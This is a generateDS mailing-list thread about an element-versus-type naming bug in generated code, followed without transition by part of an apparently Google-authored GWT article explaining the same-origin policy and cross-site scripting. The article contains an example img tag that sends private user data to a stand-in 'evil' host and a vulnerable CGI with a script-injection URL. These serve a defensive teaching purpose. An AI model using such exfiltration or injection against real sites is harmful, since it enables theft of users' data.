Cheers, Olof On Fri, Oct 27, 2017 at 8:18 PM, Dave Kuhlman <dkuhl...@davekuhlman.org> wrote: > Bob, > > Oh, nuts. I should have remembered to check on that. I apologize. > > Thank you for catching and fixing this. I've applied your patch in > my repository. > > Dave > > On Thu, Oct 26, 2017 at 05:57:39PM -0700, Bob Barcklay wrote: > > Hi Dave, > > > > I tried out the patch. It did catch and correct one of the > > element/type issues but not others that I was encountering. I did > > some tracing and found that the elements in question were not being > > processed by the patched code in the method generateBuildStandard_1. > > They were appearing in generateBuildMixed_1 so I followed the > > pattern from your patch making a similar change in that method. > > That has solved my problem. I can’t be sure that I haven’t > > introduced new problems so please take a look at the attached patch > > and let me know what you think. It includes both your original > > changes and the changes I made to generateBuildMixed_1. > > > > -Bob > > > > > > > > > > > On Oct 25, 2017, at 8:55 PM, Dave Kuhlman <dkuhl...@davekuhlman.org> > wrote: > > > > > > Bob (and Olof), > > > > > > I believe that I've fixed this one. > > > > > > The rest of this message is just notes I wrote while stumbling > > > toward what I hope is a solution. > > > > > > The fix is at < >> > > > > > > And, a patch file is attached, in case that is more convenient. > > > > > > I've found one suspicious result so far in my testing. But, it's in > > > the export to etree code, which is rarely used. I'll look into that > > > tomorrow. > > > > > > [And Dave continues to mutter to himself, mostly.] > > > > > > OK, so here is what generateDS.py believes (because I wrote it to > > > believe it): When, in an xs:complexType, you use: > > > > > > <xs:element > > > > > > it means that you are defining a child element whose name (the > > > element tag) and type (a complexType) are the same, in this case > > > "Abc". > > > > > > But, in your schema, "Abc" refers to a global xs:element, rather > > > than a xs:complexType, and the type of that element is different, in > > > this case "AbcType". > > > > > > You could fix this by changing the above child definition to: > > > > > > <xs:element > > > > > > But, I just now did a quick search, and you should not have to make > > > that change. Your schema is correct in this respect. > > > > > > So, that means that, when you use the above child definition, > > > generateDS.py should look up the global definition, and if it is an > > > xs:element (rather than an xs:complexType), then generateDS.py > > > should look up its type and use it. > > > > > > Give me a while to figure out how to do that. ... > > > > > > I just checked. The information is there to enable us to do that. > > > Now, I just need to figure out where to make the change. > > > > > > By the way, yesterday, I said that I thought that this issue seems > > > similar to an issue reported a couple of days ago. That one was > > > reported by Olof Kindgren. After studying the problem you've > > > reported and then looking at the problem reported by Olof in the > > > light of what I learned, it really does seem that these two problems > > > have a common solution. I'll have to study that a bit more. > > > > > > More later. > > > > > > Dave > > > > > > On Mon, Oct 23, 2017 at 05:07:20PM -0700, Bob Barcklay wrote: > > >> Hi, > > >> > > >> I am using generateDS to parse an XML Signature. When I attempt to > parse the signature XML, I encounter an error in a buildChildren method: > > >> > > >> $ python xmldsig.py sig.xml > > >> Traceback (most recent call last): > > >> File "xmldsig.py", line 3511, in <module> > > >> main() > > >> File "xmldsig.py", line 3504, in main > > >> parse(args[0]) > > >> File "xmldsig.py", line 3420, in parse > > >> rootObj.build(rootNode) > > >> File "xmldsig.py", line 796, in build > > >> self.buildChildren(child, node, nodeName_) > > >> File "xmldsig.py", line 816, in buildChildren > > >> obj_.build(child_) > > >> File "xmldsig.py", line 1845, in build > > >> self.buildChildren(child, node, nodeName_) > > >> File "xmldsig.py", line 1879, in buildChildren > > >> obj_ = X509Data.factory() > > >> NameError: name 'X509Data' is not defined > > >> > > >> It appears that the generated code is using the element name > (‘X509Data’) when it should be using the type/class name (‘X509DataType’). > If I regenerate the code with this switch: > > >> > > >> $generateDS —fix-type-names “X509DataType:X509Data” xmldsig.xsd > > >> > > >> It parses correctly. The schema is here: > REC-xmldsig-core-20020212/xmldsig-core-schema.xsd < > > xmldsig-core-schema.xsd><- > xmldsig-core-20020212/xmldsig-core-schema.xsd < > REC-xmldsig-core-20020212/xmldsig-core-schema.xsd>> and the relevant bits > are: > > >> > > >> > > >> <complexType name="KeyInfoType" mixed="true"> > > >> <choice maxOccurs="unbounded"> > > >> ... > > >> <element ref="ds:X509Data"/> > > >> ... > > >> <any processContents="lax" namespace="##other"/> > > >> <!-- (1,1) elements from (0,unbounded) namespaces --> > > >> </choice> > > >> <attribute name="Id" type="ID" use="optional"/> > > >> </complexType> > > >> ... > > >> <!-- Start X509Data --> > > >> <element name="X509Data" type="ds:X509DataType"/> > > >> <complexType name="X509DataType"> > > >> <sequence maxOccurs="unbounded"> > > >> <choice> > > >> ... > > >> </choice> > > >> </sequence> > > >> </complexType> > > >> > > >> I don’t understand why the generated code is calling > X509Data.factory() instead of X509DataType.factory(). X509DataType is the > name of the class in the generated py file. > > >> > > >> Is this a bug or is there something unusual in the XSD that causes > this? Is the —fix-type-names switch a proper work around? > > >> > > >> Thanks in advance for any help. > > >> > > >> -Bob > > >> > > > > > Dave Kuhlman > > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! > _______________________________________________ > generateds-users mailing list > generateds-users@lists.sourceforge.net > >
------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, Slashdot.org!
_______________________________________________ generateds-users mailing list generateds-users@lists.sourceforge.net
|
https://www.mail-archive.com/generateds-users@lists.sourceforge.net/msg00870.html
|
CC-MAIN-2018-47
|
refinedweb
| 966
| 67.55
|
Are you looking for something new to gain advantage over competitors? Application integration could be your vehicle for driving new and innovative information and business processes.
Track changes in files using XML datasets with the DiffGram format. This format lets you track what has changed, and what hasn't..
Increase your application's flexibility and make the installation simpler by connecting to the database without generating a DSN in the ODBC Data Source Administrator. Instead, use VB code to configure the connection.
Learn how to implement user profile management, a hot new feature in ASP.NET 2.0..
Develop image-management apps that exploit the .NET Framework and ASP.NET with recursion, the TreeView control, the System.Drawing.Images namespace, the System.IO namespace, and more...
Learn whether a given date is greater than or equal to a predefined date and how to add to the Expression Editor dialog box's list of Standard Expressions.
As the capabilities of handheld devices have grown, so have the threats.
Learn how to turn ADO.NET classes into tools for constructing software using C# in Mahesh Chand's book, A Programmer's Guide to ADO.NET in C#..
JAAS is based on the Pluggable Authentication Modules model and provides authentication and authorization services. Check out its many security benefits for Java applications.
> More Webcasts
|
https://visualstudiomagazine.com/Articles/List/Features.aspx?m=1&pcode=jwEdFtwgV1CrXXJNZQemnB81rZz7&userid=10074&v=70&Page=36
|
CC-MAIN-2022-33
|
refinedweb
| 221
| 51.95
|
Creating a Button control
The Button and ToggleButton controls are part of both the
MX and Spark component sets. While you can use the MX controls in
your application, Adobe recommends that you use the Spark controls
instead.Button control.
A normal Button control stays in its pressed state for as long as
the mouse button is down after you select it. A ToggleButton stays
in the pressed state until you select it a second time. The ToggleButton
control is available in Spark. In MX, the Button control contains
a toggle property that provides similar functionality. use customized graphic skins to customize your buttons to match
your application’s look and functionality. You can give the Button
and ToggleButton controls different skins. The control can change
the image skins dynamically. The following table describes the skin
states (Spark) and skin styles (MX) available for the Button and
ToggleButton controls:
Spark Button skin states
Spark ToggleButton skin states
MX Button skin styles
disabled
disabledSkin
down
disabledAndSelected
downSkin
over
overSkin
up
downAndSelected
selectedDisabledSkin
---
selectedDownSkin
overAndSelected
selectedOverSkin
selectedUpSkin
upAndSelected
upSkin
You
define a Button control
in MXML by using the <s:Button> tag, as the following
example shows. Specify an id value if you intend
to refer to the button elsewhere in your MXML, either in another
tag or in an ActionScript block. The following code creates a Button
control with the label “Hello world!”:
<?xml version="1.0"?>
<!-- controls\button\ButtonLabel.mxml -->
<s:Application xmlns:fx=""
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:
<s:Button
</s:Application>The executing SWF file for the previous example is shown below:
The executing SWF file for the previous example is shown below:
In Spark, all visual elements of a component, including layout,
are controlled by the skin. For more information on skinning, see About Spark skins.
In MX, a Button control’s icon, if specified, and label are centered
within the bounds of the Button control. You can position the text
label in relation to the icon by using the labelPlacement property,
which accepts the values right, left, bottom,
and top.
By
default, Flex stretches the Button control
width to fit the size of its label, any icon, plus six pixels of
padding around the icon. You can override this default width by
explicitly setting the width property of the Button
control to a specific value or to a percentage of its parent container.
If you specify a percentage value, the button resizes between its
minimum and maximum widths as the size of its parent container changes.
If
you explicitly size a Button control so that it is not large enough
to accommodate its label, the label is truncated and terminated
by an ellipsis (...). The full label displays as a tooltip when
you move the mouse over the Button control. If you have also set
a tooltip by using the toolTip property, the tooltip
is displayed rather than the label text. Text that is vertically
larger than the Button control is also clipped.
If you explicitly
size a Button control so that it is not large enough to accommodate
its icon, icons larger than the Button control extend outside the
Button control’s bounding box.
When a user clicks the mouse on a Button control,
the Button control dispatches a click event, as
the following example shows:
<?xml version="1.0" encoding="utf-8"?>
<!-- controls\button\ButtonClick.mxml -->
<s:Application xmlns:fx=""
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:
<fx:Script>
<![CDATA[
import mx.controls.Alert;
protected function myBtn_clickHandler(event:MouseEvent):void {
Alert.show("Goodbye!");
}
]]>
</fx:Script>
<s:Button
</s:Application>The executing SWF file for the previous example is shown below:
In this example, clicking the
Button triggers an Alert control to appear with a message to the
user.
If a Button control is enabled, it behaves as follows:
When the user moves the pointer over the Button control,
the Button control displays its rollover appearance.
When the user clicks the Button control, focus moves to the
control and the Button control displays its pressed appearance.
When the user releases the mouse button, the Button control returns
to its rollover appearance.
If the user moves the pointer off the Button control while
pressing the mouse button, the control’s appearance returns to the
rollover state and it retains focus.
For MX controls, if the toggle property
is set to true, the state of the Button control
does not change until the user releases the mouse button over the control.
For the Spark ToggleButton, this statement applies to the selected property.
If
a Button control is disabled, it displays its disabled appearance,
regardless of user interaction. In the disabled state, all mouse
or keyboard interaction is ignored.
The Button controls define
a style property, icon, that you use to add an
icon to the button. A button icon can be a GIF, JPEG, PNG, SVG,
or SWF file.
Use
the @Embed syntax in the icon property
value to embed an icon file. Or you can bind to an image that you
defined within a script block by using [Embed] metadata.
If you must reference your button graphic at runtime, you can use
an Image control instead of a Button control.
For more information
on embedding resources, see Embedding assets.
The following code example creates a Spark
Button control with a label and icon.
<?xml version="1.0" encoding="utf-8"?>
<!-- controls\button\ButtonLabelIconSpark.mxml -->
<s:Application xmlns:fx=""
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:
<fx:Script>
<![CDATA[
import assets.*;
import mx.controls.Alert;
protected function myClickHandler():void{
Alert.show("Thanks for submitting.")
}
]]>
</fx:Script>
<s:Button
</s:Application>The executing SWF file for the previous example is shown below:
Twitter™ and Facebook posts are not covered under the terms of Creative Commons.
|
http://help.adobe.com/en_US/flex/using/WS2db454920e96a9e51e63e3d11c0bf69084-7d9f.html
|
CC-MAIN-2013-48
|
refinedweb
| 964
| 54.12
|
This post will look at options for transferring arrays between Excel and Python using Pyxll, including data types, and problems associated with transferring mixed data types. In the following post I will look at the relative performance of the various options when used with a large range, which shows some big differences.
The sample data ranges used are shown below:
Range_1 includes numbers (in different display formats), text (including numbers in text format), blank cells, and a variety of error constants. Cell D5 contains a text string showing the value of pi to 17 significant figures. Range_2 includes just numbers and blank cells, and Range_3 just numbers with no blanks. Range_4 and Range_5 are a single row and column for use with the Pyxll numpy_row and numpy_column data types.
The first 6 examples illustrate the use of Python User Defined Functions (UDFs) in Excel, using the Pyxll @xl_func decorator. Typical code is shown below:
@xl_func("var InRange, int Out: var") def py_GetTypes1(InRange, Out): numrows = len(InRange) numcols = len(InRange[0]) if Out == 1: # Create Numpy text array and read data types for each cell in InRange outa = np.zeros((numrows, numcols), dtype='|S20') for i in range(0, numrows): for j in range(0, numcols): outa[i,j] = type(InRange[i][j]) return outa elif Out == 2: # Return size of InRange outa = np.zeros((1,2)) outa[0,0] = numrows outa[0,1] = numcols return outa elif Out == 3: # Sum rows in InRange rowsum = sumrows1(InRange) return rowsum elif Out == 4: # Sum rows using Numba jit compiler fastsum = autojit(sumrows1) rowsum = fastsum(InRange) return rowsum else: # Return InRange return InRange
The @xl_func decorator specifies the data type for the input function arguments, and the return values, which may be a single cell value or a range or array in both cases.
The most versatile of the data types is “var”, which is similar to a VBA variant object:
Using Range_1 we see that all cells with numeric values are passed as ‘float’, including date and currency values. Blank cells are passed as ‘NoneType’, Boolean as ‘bool’, and text as ‘unicode’ (in Excel 2007 and later). The error constants are passed as various types of ‘exception’. The text string version of pi is returned as text, including all 17 significant figures. This string will be recognised as a numerical value by Excel, but the additional significant figures will be lost. Pi()-D31 will return exactly zero for instance.
Note that the blank cell is returned as a value of zero.
Use of var[] for input produces exactly the same results as var:
However, if the numpy array of data types is returned as var[], this is returned as a single text string:
When Range_1 is passed as numpy_array, this produces an error, because all the values are expected to be numeric or blank. With Range_2 all the values (including the blank cells) are passed as ‘numpy.float64’. Note that the blank cells are returned as a value of zero:
Using the numpy_row and numpy_column data types values (which must be numbers or blank) are passed as ‘numpy.float64’, creating a 1D numpy array. If this array is returned to Excel using the var data type the result is an error because a var is expected to be either a single value or a 2D array (or list of lists). The 1D array produced by numpy_row or numpy_column may be returned as either a row or column, allowing data to be transposed (see last example below):
If the data is all numeric or blank, it may be passed as an array of floats using float[]. Note that, as with the numpy_array type, attempting to pass non-numeric data results in an error. Both numbers and blank cells are passed as ‘float’, and blanks are returned as a value of zero:
The remaining examples illustrate the use of the xl.Range object inside Python to read data from the spreadsheet using COM. This must be initiated using the following code:
from pyxll import xl_menu, get_active_object def xl_app(): """returns a Dispatch object for the current Excel instance""" # get the Excel application object from PyXLL and wrap it xl_window = get_active_object() xl_app = win32com.client.Dispatch(xl_window).Application # it's helpful to make sure the gen_py wrapper has been created # as otherwise things like constants and event handlers won't work. win32com.client.gencache.EnsureDispatch(xl_app) return xl_app xl = xl_app()
Functions may then be written entirely within Python to read and write from/to range addresses, or named ranges, or as in these examples, I have written short VBA routines to pass range names to the Python code. A typical example is:
Sub py_GetTypeSub1() Dim RtnA As Variant, Func As String, InRange As String, OutRange As String, Out As Long, TRange As String ' Read range names and Out index value from the spreadsheet Func = Range("Func").Value InRange = Range("In_Range").Value OutRange = Range("Out_Range").Value Out = Range("Out").Value TRange = Range("trange").Value ' The python function 'Func' will read data from InRange, and write to OutRange RtnA = Application.Run(Func, InRange, OutRange, Out) ' If Out = 4 the Python function will return execution time data, which is written to TRange If Out = 4 Then Range(TRange).Value2 = RtnA End Sub
The data in a named Excel range ‘InRangetxt’ may be read into a Python list of lists with the code:
@xl_func("string InRangetxt, string OutRange, int Out: var") def py_GetTypes8(InRangetxt, OutRange, Out): InRange = xl.Range(InRangetxt).Value
Note that in this case the VBA function passes just a string with the range name.
The results are similar to using the Pyxll ‘var’ object, except that:
- Error constants are read as type ‘int’ and written to the spreadsheet as negative integers
- Blanks are read as ‘NoneType” but are written back as blanks, rather than zero
- All strings are read as ‘unicode’, but strings looking like numbers are written back as numbers, truncated to 15 significant figures
- Numbers formatted as date or currency are read as ‘time’ and ‘decimal.Decimal’ respectively.
Range data may be read into a numpy array using:
@xl_func("string InRangetxt, string OutRange, int Out: var")< def py_GetTypes9(InRangetxt, OutRange, Out): InRange = np.array(xl.Range(InRangetxt).Value)
In this case the array data types are automatically coerced into the appropriate data type, with the same results as reading to a Python list of lists:
The data type for the Numpy array may be specified using:
@xl_func("string InRangetxt, string OutRange, int Out: var") def py_GetTypes10(InRangetxt, OutRange, Out): InRange = np.array(xl.Range(InRangetxt).Value, dtype=np.float64)
In this case Range_1 will generate an error because it contains non-numeric data.
Range_2 is read as ‘numpy.float64’ for all cells, including the blanks, but the blank cells are written back as integers, 65535:
Data that may contain blanks can be checked using the numpy ‘isnan’ property:
for i in range(0, numrows): for j in range(0, numcols): if np.isnan(InRange[i,j]): InRange[i,j] = 0
The data may be read into a numpy string array using:
@xl_func("string InRangetxt, string OutRange, int Out: var") def py_GetTypes11(InRangetxt, OutRange, Out): InRange = np.array(xl.Range(InRangetxt).Value, dtype='|S24')
In this case the data from Range_1 is read as a string in all cases. Note that:
- The value of pi is read into a string, but is written back as a value truncated to 12 significant figures
- The 17 significant figure text string is read as a string, but written back as a value truncated to 15 significant figures
- The blank cell and error constants are read as strings, but written back as ‘None’ and ‘-2146826281’ respectively
In the case of Range_2 all the values are read as ‘float’ or ‘NoneType’, and written back as values truncated to 12 significant figures or ‘None’
Pingback: Transfer of arrays to/from Python with Pyxll – Part 2; Speed | Newton Excel Bach, not (just) an Excel Blog
Great job explaining this! I’m about to use this in order to get a range and manipulate it a bit using pandas
|
https://newtonexcelbach.com/2014/03/16/transfer-of-arrays-tofrom-python-with-pyxll-part1-data-types/
|
CC-MAIN-2020-40
|
refinedweb
| 1,345
| 53.55
|
import java.awt.Color;
import java.util.HashMap;
public class test {
public static void main(String[] args) {
HashMap<Color, String> m = new HashMap<Color, String>();
m.put(Color.RED, "red");
System.out.println(m.get("red"));
HashMap<Long, String> n = new HashMap<Long, String>();
n.put(100L, "red");
System.out.println(n.get(100));
}
}
I've actually seen someone make this mistake, and want me to explain to them why in hell the Java compiler let them pass an object that wasn't of type
Kto
HashMap<K, V>.get. Wasn't the very reason they rewrote their code to use generics, they asked, to be protected from this kind of mistake?
The reason this compiles is that although
puthas the signature you'd expect,
get(and
containsKey,
containsValue, and
remove) don't. They all take parameters of type
Object.
It's the usual reason something's broken: backwards compatibility. Neal Gafter brushes it off thus:
The reason the argument type is Object and not K is that existing code depends on the fact that passing the "wrong" key type is allowed, causes no error, and simply results in the key not being found in the map. This is no worse than "accidentally" trying to get() with a key of the right type but the wrong value. Since none of these methods place the key into the map, it is entirely typesafe to use Object as the method's parameter.
Backwards compatibility is all well and good, but I can hear Stroustrup wondering why we have to pay for things we don't use. I keep my code up-to-date, and yet I have to suffer this breakage for the benefit of the guy who lost his source in 1997? Why don't my "-source 1.5 -target 1.5" arguments to the compiler let me have libraries without bugs or infelicities from years ago?
The "no worse" bit is particularly cheeky, slippery language-lawyer talk, since the two classes of error are not comparable (looking up a non-existant key isn't even necessarily an error, and one of these classes of error is something the compiler should catch for us; no C++ compiler would accept incorrect code like the above). Gafter implies that the sole purpose of generics, and the only guarantee from "type safety" is that you won't have a malformed collection. Which is a good thing, and better than nothing, but disregards the concerns of the users (rather than the authors) of the collections classes.
It's especially cheeky when you consider the second example, where our arch-enemy autoboxing lends a hand. You might think the exact example (autoboxing choosing the wrong type for the literal) is unlikely, and I'd be inclined to agree (though I wouldn't agree that that's an excuse for the compiler to miss it), but I've seen someone make a similar mistake, where they started with an index into an indexed collection and should have got the corresponding element and looked the element up in a hash, but accidentally tried to look up the index in the hash instead. Nonsense code of exactly the kind that generics and static typing are supposed to protect you from, and not so much as a run-time error; just wrong behavior.
Update: Neil Gafter responds:
We would love to have made Map.get and remove take K instead of Object, and we tried that. Unfortunately, it broke lots of genuine, correct, production customer code which depends on the existing behavior, which was after all specified in the interface before it was generified.
He also provides one example of the kind of code that was already out there:
One kind of example goes something like this: You have a system in which you handle lots of objects of type
Foo. There is some particular subtype of
Foocalled
Barthat you sometimes cache in a collection. Sometimes some of your
Fooobjects become "out of date" and have to be flushed from any caches. So you have a
Collection<Bar> barCache;
Collection<Foo> outOfDateThings;
and you just
for (Foo foo : outOfDateThings) barCache.remove(foo);
(Ignoring the fact that I used the new looping construct) This kind of code was clearly correct and typesafe before the collection classes were generified. The code used the collection classes in ways that only depended on specified behavior.
You have to decide for yourself if such examples are convincing.
His most interesting comment, though, was this:
By the way, what you lose in "checking" you gain in flexibility; folks using the (existing) relaxed Map API can actually do useful things that the (hypothetical) stricter version doesn't allow.
Which has me shaking my head again, and Stroustrup wondering why we're all paying for something even when we don't need it. I still think this is an odd way to look at it, because it's the kind of thing you usually hear from the dynamic typing crowd. The word 'checking' in quotes? Argument by appeal to flexibility?
Ricky Clarkson and Thomas Hawtin both think it's an important decision because it makes wildcards more useful than they would otherwise be. Even if there were no legacy code, they want code like
List<?>.contains(something)
and
List<? super Integer>.contains(5)
to work. Hawtin imagines an alternate universe where we could have our cake and eat it, and say something like this:
public V get (? super K key) { // not valid Java
Given the number of times I've talked about C++ above, it's worth mentioning Stroustrup and Dos Reis' Specifying C++ Concepts, which talks about the author's attempts to describe "concepts" to the computer. (In the C++ world, "concept" is the name for a set of type requirements. At the moment these are described in English, in documentation, for human consumption only. You'll get a compile-time error if a template instantiation leads to invalid code, perhaps because a type you used doesn't support a required operation. Other times you'll just get run-time errors, similar to the problems you can get in Java from bad
equalsor
hashCodeimplementations.)
My real concern for Java, though, as I said above, is about Java's future when there's this strong promise of backwards compatibility but no corresponding mechanism for fixing old decisions. It would be a shame to have to move house just because the toilet won't flush.
On a lighter note, I was caught out recently myself, too. As I typed something analogous to the following, I thought my editor's code coloring was broken:
public class C {
public static void main(String[] args) {
/* System.err.println("*/"); */
}
}
The compiler confirmed, though, that there was an unterminated string. The temptation is to say "stupid compiler!", because there "obviously" isn't: anyone can see that there's a valid string literal in there that just happens to contain the characters that terminate Java block comments.
Neal Gafter recently wrote, in the context of a proposal to add closures to Java, about "Gilad's insistence that we comply with Tennent's Correspondence and Abstraction Principles (described in detail in the now out-of-print book Principles of Programming Languages by R.D.Tennent)". [Embarrassing that a great book you remember from university should now be out of print, even if it was a decade old in your day.] So here, for example, you'd want to be able to block-comment or uncomment any piece of code without changing its well-formedness.
Unfortunately, the compiler doesn't magically know where a comment ends. So it has no choice but to just munch through characters until it next sees "*/", causing it to read the body of
mainas a comment followed the unterminated string literal "); */ (Java string literals can't contain unescaped newlines, so the lexical analyzer recognizes the problem at that point). Commenting isn't really an abstraction mechanism, but you can see how this might upset Tennent. There's no good solution, though, because block comments are often required precisely because the code they contain isn't well-formed. So we can't expect the compiler to parse the content of block comments looking for string literals.
There's a work-around, of course, that gives you code that works with or without the block comment, but this kind of intrusion is always unwelcome, even when there's no solution (as far as I'm aware) to the underlying problem:
public class C {
public static void main(String[] args) {
/* System.err.println("*" + "/"); */
}
}
|
http://elliotth.blogspot.com/2006/09/hashmap-type-safety-leaves-something.html
|
CC-MAIN-2016-50
|
refinedweb
| 1,428
| 59.33
|
Konrad Rzeszutek Wilk a écrit :> On Fri, Jan 21, 2011 at 10:41:54PM +0100, matthieu castet wrote:>> Konrad Rzeszutek Wilk a écrit :>>>> - * .data and .bss should always be writable.>>>> + * .data and .bss should always be writable, but xen won't like>>>> + * if we make page table rw (that live in .data or .bss)>>>> */>>>> +#ifdef CONFIG_X86_32>>>> if (within(address, (unsigned long)_sdata, (unsigned long)_edata) ||>>>> - within(address, (unsigned long)__bss_start, (unsigned long)__bss_stop))>>>> - pgprot_val(required) |= _PAGE_RW;>>>> + within(address, (unsigned long)__bss_start, (unsigned long)__bss_stop)) {>>>> + unsigned int level;>>>> + if (lookup_address(address, &level) && (level != PG_LEVEL_4K))>>>> + pgprot_val(forbidden) |= _PAGE_RW;>>>> + }>>>> +#endif>>>> #if defined(CONFIG_X86_64) && defined(CONFIG_DEBUG_RODATA)>>>>>>>> fyi, it does make it boot.>>> Hold it.. ccache is a wonderful tool but I think I've just "rebuilt" the>>> binaries with the .bss HPAGE_ALIGN aligment by mistake, so this path got never>>> taken.>>>>>>>> Ok,>>>> ATM I saw the following solution to solve the problem :>> 1) remove the data/bss check in static_protections, it was introduced by NX patches (64edc8ed). But I am not sure it>> is really needed anymore.>> 2) add ". = ALIGN(HPAGE_SIZE)" somewhere after init section. But if we want not to be allocated in image we>> should put it before bss. And if we want to be freed after init, we should put before .init.end.>> This mean moving .smp_locks (and .data_nosave when x86 will be added) before init section. I have no idea of the impact.>> 3) add some logic in arch/x86/xen/mmu.c, that will ignore RW page setting for the page table marked RO.>> 4) make static_protections take and old_prot argument, and only apply RW .data/.bss requirement if page is already RW.>>>> If possible I will go for 1).> > Sounds good. Just send me the patch and I will test it.Ok, what give you the attached patch.I don't know if I should give the printk or not.Matthieudiff --git a/arch/x86/mm/pageattr.c b/arch/x86/mm/pageattr.cindex 8b830ca..eec93c5 100644--- a/arch/x86/mm/pageattr.c+++ b/arch/x86/mm/pageattr.c@@ -256,7 +256,6 @@ static inline pgprot_t static_protections(pgprot_t prot, unsigned long address, unsigned long pfn) { pgprot_t forbidden = __pgprot(0);- pgprot_t required = __pgprot(0); /* * The BIOS area between 640k and 1Mb needs to be executable for@@ -283,11 +282,13 @@ static inline pgprot_t static_protections(pgprot_t prot, unsigned long address, __pa((unsigned long)__end_rodata) >> PAGE_SHIFT)) pgprot_val(forbidden) |= _PAGE_RW; /*- * .data and .bss should always be writable.+ * .data and .bss should always be writable, but xen won't like+ * if we make page table rw (that live in .data or .bss) */ if (within(address, (unsigned long)_sdata, (unsigned long)_edata) || within(address, (unsigned long)__bss_start, (unsigned long)__bss_stop))- pgprot_val(required) |= _PAGE_RW;+ if ((pgprot_val(prot) & _PAGE_RW) == 0)+ printk(KERN_INFO "RO page for 0x%lx in bss/data.\n", address); #if defined(CONFIG_X86_64) && defined(CONFIG_DEBUG_RODATA) /*@@ -327,7 +328,6 @@ static inline pgprot_t static_protections(pgprot_t prot, unsigned long address, #endif prot = __pgprot(pgprot_val(prot) & ~pgprot_val(forbidden));- prot = __pgprot(pgprot_val(prot) | pgprot_val(required)); return prot; }
|
https://lkml.org/lkml/2011/1/23/53
|
CC-MAIN-2019-47
|
refinedweb
| 499
| 57.47
|
Dan Morrill, Google Developer Relations Team
Updated January 2009
It is a sad truth that JavaScript applications are easily left vulnerable to several types of security exploits, if developers are unwary. Because the GWT produces JavaScript code, we GWT developers are no less vulnerable to JavaScript attacks than anyone else. However, because the goal of GWT is to allow developers to focus on their users' needs instead of JavaScript and browser quirks, it's easy to let our guards down. To make sure that GWT developers have a strong appreciation of the risks, we've put together this article.
GWT's mission is to provide developers with the tools they need to build AJAX apps that make the web a better place for end users. However, the apps we build have to be secure as well as functional, or else our community isn't doing a very good job at our mission.
This article is a primer on JavaScript attacks, intended for GWT developers. The first portion describes the major classes of attacks against JavaScript in general terms that are applicable to any AJAX framework. After that background information on the attacks, the second portion describes how to secure your GWT applications against them.
These problems, like so many others on the Internet, stem from malicious programmers. There are people out there who spend a huge percentage of their lives thinking of creative ways to steal your data. Vendors of web browsers do their part to stop those people, and one way they accomplish it is with the Same-Origin Policy.
The Same-Origin Policy (SOP) says that code running in a page that was loaded from Site A can't access data or network resources belonging to any other site, or even any other page (unless that other page was also loaded from Site A.) The goal is to prevent malicious hackers from injecting evil code into Site A that gathers up some of your private data and sends it to their evil Site B. This is, of course, the well-known restriction that prevents your AJAX code from making an XMLHTTPRequest call to a URL that isn't on the same site as the current page. Developers familiar with Java Applets will recognize this as a very similar security policy.
There is, however, a way around the Same-Origin Policy, and it all starts with trust. A web page owns its own data, of course, and is free to submit that data back to the web site it came from. JavaScript code that's already running is trusted to not be evil, and to know what it's doing. If code is already running, it's too late to stop it from doing anything evil anyway, so you might as well trust it.
One thing that JavaScript code is trusted to do is load more content. For example, you might build a basic image gallery application by writing some JavaScript code that inserts and deletes <img> tags into the current page. When you insert an <img> tag, the browser immediately loads the image as if it had been present in the original page; if you delete (or hide) an <img> tag, the browser removes it from the display.
Essentially, the SOP lets JavaScript code do anything that the original HTML page could have done -- it just prevents that JavaScript from sending data to a different server, or from reading or writing data belonging to a different server.
The text above said, "prevents JavaScript from sending data to a different server." Unfortunately, that's not strictly true. In fact it is possible to send data to a different server, although it might be more accurate to say "leak."
JavaScript is free to add new resources -- such as <img> tags -- to the current page. You probably know that you can cause an image hosted on foo.com to appear inline in a page served up by bar.com. Indeed, some people get upset if you do this to their images, since it uses their bandwidth to serve an image to your web visitor. But, it's a feature of HTML, and since HTML can do it, so can JavaScript.
Normally you would view this as a read-only operation: the browser requests an image, and the server sends the data. The browser didn't upload anything, so no data can be lost, right? Almost, but not quite. The browser did upload something: namely, the URL of the image. Images use standard URLs, and any URL can have query parameters encoded in it. A legitimate use case for this might be a page hit counter image, where a CGI on the server selects an appropriate image based on a query parameter and streams the data to the user in response. Here is a reasonable (though hypothetical) URL that could return a hit-count image showing the number '42':
In the static HTML world, this is perfectly reasonable. After all, the server is not going to send the client to a web site that will leak the server's or user's data -- at least, not on purpose. Because this technique is legal in HTML, it's also legal in JavaScript, but there is an unintended consequence. If some evil JavaScript code gets injected into a good web page, it can construct <img> tags and add them to the page.
It is then free to construct a URL to any hostile domain, stick it in an <img> tag, and make the request. It's not hard to imagine a scenario where the evil code steals some useful information and encodes it in the <img> URL; an example might be a tag such as:
<img src=""/>
If
private_user_data is a password, credit card number, or something similar, there'd be a major problem. If the evil code sets the size of the image to 1 pixel by 1 pixel, it's very unlikely the user will even notice it.
The type of vulnerability just described is an example of a class of attacks called "Cross-Site Scripting" (abbreviated as "XSS"). These attacks involve browser script code that transmits data (or does even worse things) across sites. These attacks are not limited to <img> tags, either; they can be used in most places the browser lets script code access URLs. Here are some more examples of XSS attacks:
Clearly, if evil code gets into your page, it can do some nasty stuff. By the way, don't take my examples above as a complete list; there are far too many variants of this trick to describe here.
Throughout all this there's a really big assumption, though: namely, that evil JavaScript code could get itself into a good page in the first place. This sounds like it should be hard to do; after all, servers aren't going to intentionally include evil code in the HTML data they send to web browsers. Unfortunately, it turns out to be quite easy to do if the server (and sometimes even client) programmers are not constantly vigilant. And as always, evil people are spending huge chunks of their lives thinking up ways to do this.
The list of ways that evil code can get into an otherwise good page is endless. Usually they all boil down to unwary code that parrots user input back to the user. For instance, this Python CGI code is vulnerable:
import cgi f = cgi.FieldStorage() name = f.getvalue('name') or 'there' s = '<html><body><div>Hello, ' + name + '!</div></body></html>' print 'Content-Type: text/html' print 'Content-Length: %s' % (len(s),) print print s
The code is supposed to print a simple greeting, based on a form input. For instance, a URL like this one would print "Hello, Dan!":
However, because the CGI doesn't inspect the value of the "name" variable, an attacker can insert script code in there.
Here is some JavaScript that pops up an alert window:
<script>alert('Hi');</script>
That script code can be encoded into a URL such as this:
That URL, when run against the CGI above, inserts the <script> tag directly into the <div> block in the generated HTML. When the user loads the CGI page, it still says "Hello, Dan!" but it also pops up a JavaScript alert window.
